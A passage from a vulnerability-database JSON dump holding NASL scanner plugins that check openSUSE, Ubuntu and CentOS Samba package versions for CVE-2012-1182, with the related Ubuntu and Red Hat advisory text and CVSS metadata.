rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0-debuginfo\", rpm:\"libsmbsharemodes0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc-devel\", rpm:\"libtalloc-devel~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2\", rpm:\"libtalloc2~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo\", rpm:\"libtalloc2-debuginfo~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb-devel\", rpm:\"libtdb-devel~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1\", rpm:\"libtdb1~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo\", rpm:\"libtdb1-debuginfo~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent-devel\", rpm:\"libtevent-devel~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0\", rpm:\"libtevent0~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo\", rpm:\"libtevent0-debuginfo~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-devel\", rpm:\"samba-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing\", rpm:\"samba-krb-printing~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb-printing-debuginfo\", rpm:\"samba-krb-printing-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo\", rpm:\"samba-winbind-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-32bit\", rpm:\"libldb1-32bit~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo-32bit\", rpm:\"libldb1-debuginfo-32bit~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-32bit\", rpm:\"libsmbclient0-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-32bit\", rpm:\"libsmbclient0-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-32bit\", rpm:\"libtalloc2-32bit~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo-32bit\", rpm:\"libtalloc2-debuginfo-32bit~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-32bit\", rpm:\"libtdb1-32bit~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo-32bit\", rpm:\"libtdb1-debuginfo-32bit~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-32bit\", rpm:\"libtevent0-32bit~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo-32bit\", rpm:\"libtevent0-debuginfo-32bit~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-32bit\", rpm:\"libwbclient0-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-32bit\", rpm:\"libwbclient0-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-32bit\", rpm:\"samba-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-32bit\", rpm:\"samba-client-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-32bit\", rpm:\"samba-client-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-32bit\", rpm:\"samba-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-32bit\", rpm:\"samba-winbind-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-32bit\", rpm:\"samba-winbind-debuginfo-32bit~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo-x86\", rpm:\"libldb1-debuginfo-x86~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-x86\", rpm:\"libldb1-x86~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo-x86\", rpm:\"libsmbclient0-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-x86\", rpm:\"libsmbclient0-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-debuginfo-x86\", rpm:\"libtalloc2-debuginfo-x86~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtalloc2-x86\", rpm:\"libtalloc2-x86~2.0.5~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-debuginfo-x86\", rpm:\"libtdb1-debuginfo-x86~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtdb1-x86\", rpm:\"libtdb1-x86~1.2.9~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-debuginfo-x86\", rpm:\"libtevent0-debuginfo-x86~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtevent0-x86\", rpm:\"libtevent0-x86~0.9.11~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-debuginfo-x86\", rpm:\"libwbclient0-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0-x86\", rpm:\"libwbclient0-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-debuginfo-x86\", rpm:\"samba-client-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-x86\", rpm:\"samba-client-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo-x86\", rpm:\"samba-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-debuginfo-x86\", rpm:\"samba-winbind-debuginfo-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-x86\", rpm:\"samba-winbind-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-x86\", rpm:\"samba-x86~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-02-01T07:15:06", "description": "Brian Gorenc discovered that Samba incorrectly calculated array bounds\nwhen handling remote procedure calls (RPC) over the network. A remote,\nunauthenticated attacker could exploit this to execute arbitrary code\nas the root user. (CVE-2012-1182).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2012-04-13T00:00:00", "title": "Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 : samba vulnerability (USN-1423-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "p-cpe:/a:canonical:ubuntu_linux:samba", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts"], "id": "UBUNTU_USN-1423-1.NASL", "href": "https://www.tenable.com/plugins/nessus/58743", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1423-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(58743);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"USN\", value:\"1423-1\");\n\n script_name(english:\"Ubuntu 8.04 LTS / 10.04 LTS / 11.04 / 11.10 : samba vulnerability (USN-1423-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Brian Gorenc discovered that Samba incorrectly calculated array bounds\nwhen handling remote procedure calls (RPC) over the network. A remote,\nunauthenticated attacker could exploit this to execute arbitrary code\nas the root user. (CVE-2012-1182).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1423-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2012-2019 Canonical, Inc. / NASL script (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(8\\.04|10\\.04|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 8.04 / 10.04 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"8.04\", pkgname:\"samba\", pkgver:\"3.0.28a-1ubuntu4.18\")) flag++;\nif (ubuntu_check(osver:\"10.04\", pkgname:\"samba\", pkgver:\"2:3.4.7~dfsg-1ubuntu3.9\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"samba\", pkgver:\"2:3.5.8~dfsg-1ubuntu2.4\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"samba\", pkgver:\"2:3.5.11~dfsg-1ubuntu2.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:28:32", "description": "Updated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. (BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.", "edition": 25, "published": "2013-03-10T00:00:00", "title": "CentOS 6 : samba4 (CESA-2013:0506)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1182"], "modified": "2013-03-10T00:00:00", "cpe": ["p-cpe:/a:centos:centos:samba4-common", "p-cpe:/a:centos:centos:samba4-libs", "cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:samba4-pidl", "p-cpe:/a:centos:centos:samba4-winbind-krb5-locator", "p-cpe:/a:centos:centos:samba4-client", "p-cpe:/a:centos:centos:samba4-dc", "p-cpe:/a:centos:centos:samba4-devel", "p-cpe:/a:centos:centos:samba4-winbind", "p-cpe:/a:centos:centos:samba4", "p-cpe:/a:centos:centos:samba4-winbind-clients", "p-cpe:/a:centos:centos:samba4-dc-libs", "p-cpe:/a:centos:centos:samba4-test", "p-cpe:/a:centos:centos:samba4-python", "p-cpe:/a:centos:centos:samba4-swat"], "id": "CENTOS_RHSA-2013-0506.NASL", "href": "https://www.tenable.com/plugins/nessus/65141", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0506 and \n# CentOS Errata and Security Advisory 2013:0506 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65141);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_xref(name:\"RHSA\", value:\"2013:0506\");\n\n script_name(english:\"CentOS 6 : samba4 (CESA-2013:0506)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba4 packages that fix one security issue, multiple bugs,\nand add various enhancements are now available for Red Hat Enterprise\nLinux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nA flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\ncompiler, used to generate code to handle RPC calls. This could result\nin code generated by the PIDL compiler to not sufficiently protect\nagainst buffer overflows. (CVE-2012-1182)\n\nThe samba4 packages have been upgraded to upstream version 4.0.0,\nwhich provides a number of bug fixes and enhancements over the\nprevious version. In particular, improved interoperability with Active\nDirectory (AD) domains. SSSD now uses the libndr-krb5pac library to\nparse the Privilege Attribute Certificate (PAC) issued by an AD Key\nDistribution Center (KDC).\n\nThe Cross Realm Kerberos Trust functionality provided by Identity\nManagement, which relies on the capabilities of the samba4 client\nlibrary, is included as a Technology Preview. This functionality and\nserver libraries, is included as a Technology Preview. This\nfunctionality uses the libndr-nbt library to prepare Connection-less\nLightweight Directory Access Protocol (CLDAP) messages.\n\nAdditionally, various improvements have been made to the Local\nSecurity Authority (LSA) and Net Logon services to allow verification\nof trust from a Windows system. Because the Cross Realm Kerberos Trust\nfunctionality is considered a Technology Preview, selected samba4\ncomponents are considered to be a Technology Preview. For more\ninformation on which Samba packages are considered a Technology\nPreview, refer to Table 5.1, 'Samba4 Package Support' in the Release\nNotes, linked to from the References. (BZ#766333, BZ#882188)\n\nThis update also fixes the following bug :\n\n* Prior to this update, if the Active Directory (AD) server was\nrebooted, Winbind sometimes failed to reconnect when requested by\n'wbinfo -n' or 'wbinfo -s' commands. Consequently, looking up users\nusing the wbinfo tool failed. This update applies upstream patches to\nfix this problem and now looking up a Security Identifier (SID) for a\nusername, or a username for a given SID, works as expected after a\ndomain controller is rebooted. (BZ#878564)\n\nAll users of samba4 are advised to upgrade to these updated packages,\nwhich fix these issues and add these enhancements.\n\nWarning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\nEnterprise Linux 6.4 and you have Samba in use, you should make sure\nthat you uninstall the package named 'samba4' to avoid conflicts\nduring the upgrade.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-March/019498.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c7fd5e17\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2013-February/000689.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?189565c5\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba4 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-1182\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Samba SetInformationPolicy AuditEventsInfo Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-dc-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-pidl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:samba4-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/04/10\");\n 